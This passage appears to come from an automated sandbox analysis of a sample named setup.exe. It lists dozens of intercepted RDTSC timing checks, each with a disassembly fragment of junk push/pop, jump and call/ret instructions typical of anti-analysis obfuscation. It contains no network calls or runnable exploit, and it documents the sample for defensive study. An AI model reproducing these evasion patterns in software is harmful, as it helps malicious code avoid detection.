                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2C0F6 second address: E2C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2DBC9 second address: E2DBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2DBCD second address: E2DBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FCh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF32CFB71FDh 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2DBF6 second address: E2DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2DC03 second address: E2DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2DC09 second address: E2DC0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E30CC1 second address: E30CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E30CC5 second address: E30CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2F679 second address: E2F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2F67E second address: E2F684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2F684 second address: E2F688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E31055 second address: E3105B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E34166 second address: E3416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E37A5B second address: E37A98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FF32CDD6566h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF32CDD6577h 0x00000014 jmp 00007FF32CDD656Fh 0x00000019 js 00007FF32CDD656Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E37DCD second address: E37DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E37DD1 second address: E37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF32CDD6566h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E37DE1 second address: E37DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E37DE7 second address: E37DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E380C3 second address: E380C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3838D second address: E38391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E38391 second address: E3839F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E39C32 second address: E39C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E39C38 second address: E39C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E39C3C second address: E39C4A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E39C4A second address: E39C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3C698 second address: E3C69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3C69E second address: E3C6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3C6A2 second address: E3C6B6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF32CDD6566h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E52B second address: E3E567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FF32CFB71FEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF32CFB7202h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jnp 00007FF32CFB7202h 0x0000001e ja 00007FF32CFB71FCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3E665 second address: E3E66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3EA3D second address: E3EA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3EA43 second address: E3EA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F0AE second address: E3F0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F0B7 second address: E3F0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F182 second address: E3F186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F2EA second address: E3F2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F5D3 second address: E3F5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F5D7 second address: E3F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3F5DD second address: E3F626 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF32CFB71F8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movsx esi, si 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FF32CFB7206h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E41D07 second address: E41D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E42454 second address: E4245A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4245A second address: E42460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E42460 second address: E42464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44280 second address: E44286 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44286 second address: E44290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CFB71F6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44290 second address: E442F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FF32CDD656Bh 0x00000010 jmp 00007FF32CDD6572h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1246ED0Ch], ecx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF32CDD6568h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1C24h], ebx 0x00000040 sub di, 5FBFh 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E442F6 second address: E442FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E46012 second address: E46016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E49048 second address: E49050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4AC52 second address: E4AC6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF32CDD656Fh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4AC6C second address: E4AD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7202h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF32CFB71F8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call 00007FF32CFB7206h 0x0000002c sbb bx, 52BFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460B16h], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FF32CFB71F8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jng 00007FF32CFB71F8h 0x0000005c mov bl, 0Dh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FF32CFB71F8h 0x00000067 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4DBB0 second address: E4DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CDFA second address: E4CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CF0B second address: E4CF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4FCD6 second address: E4FCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF32CFB71F6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4FCE0 second address: E4FD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CDD6573h 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 520426D3h 0x00000015 call 00007FF32CDD6573h 0x0000001a mov dword ptr [ebp+12460B16h], edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+124610CAh], edx 0x0000002a push 00000000h 0x0000002c jns 00007FF32CDD6566h 0x00000032 jnl 00007FF32CDD656Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FF32CDD6571h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4FE41 second address: E4FE47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4FE47 second address: E4FE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CDD6566h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E51D05 second address: E51D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E52E67 second address: E52E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6574h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E52E82 second address: E52E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E53F2D second address: E53F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E53F32 second address: E53F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E55005 second address: E55076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FF32CDD6566h 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF32CDD6568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub ebx, dword ptr [ebp+122D26A2h] 0x00000034 mov bx, B540h 0x00000038 push 00000000h 0x0000003a mov di, 2F00h 0x0000003e xchg eax, esi 0x0000003f jbe 00007FF32CDD6574h 0x00000045 push eax 0x00000046 jg 00007FF32CDD6581h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CDD656Fh 0x00000053 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E55076 second address: E5507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E51F22 second address: E51FD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD6570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cld 0x00000013 mov di, FC51h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, dword ptr [ebp+122D32D3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF32CDD6568h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 call 00007FF32CDD656Fh 0x0000004a mov ebx, dword ptr [ebp+122D30C0h] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0F39h] 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FF32CDD6568h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 mov bx, dx 0x00000074 push FFFFFFFFh 0x00000076 je 00007FF32CDD656Ch 0x0000007c sub ebx, dword ptr [ebp+122D2BBFh] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FF32CDD656Ch 0x0000008a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E56033 second address: E56038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E56038 second address: E56091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF32CDD6566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF32CDD6568h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a adc di, 19A0h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FF32CDD6568h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c push ecx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5526D second address: E55271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E57011 second address: E57040 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FF32CDD6577h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FFE6 second address: E5FFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FB87 second address: E5FB97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FB97 second address: E5FB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FB9D second address: E5FBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FBA1 second address: E5FBB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF32CFB71FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FBB5 second address: E5FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5FBC0 second address: E5FBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E63110 second address: E63137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FF32CDD6568h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E63137 second address: E6313D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6313D second address: E63165 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FF32CDD6576h 0x00000016 pop ecx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E63165 second address: E6318B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FF32CFB7204h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E63291 second address: E6329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF32CDD6566h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E633D0 second address: E633D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E633D4 second address: E633D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E633D8 second address: E633E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
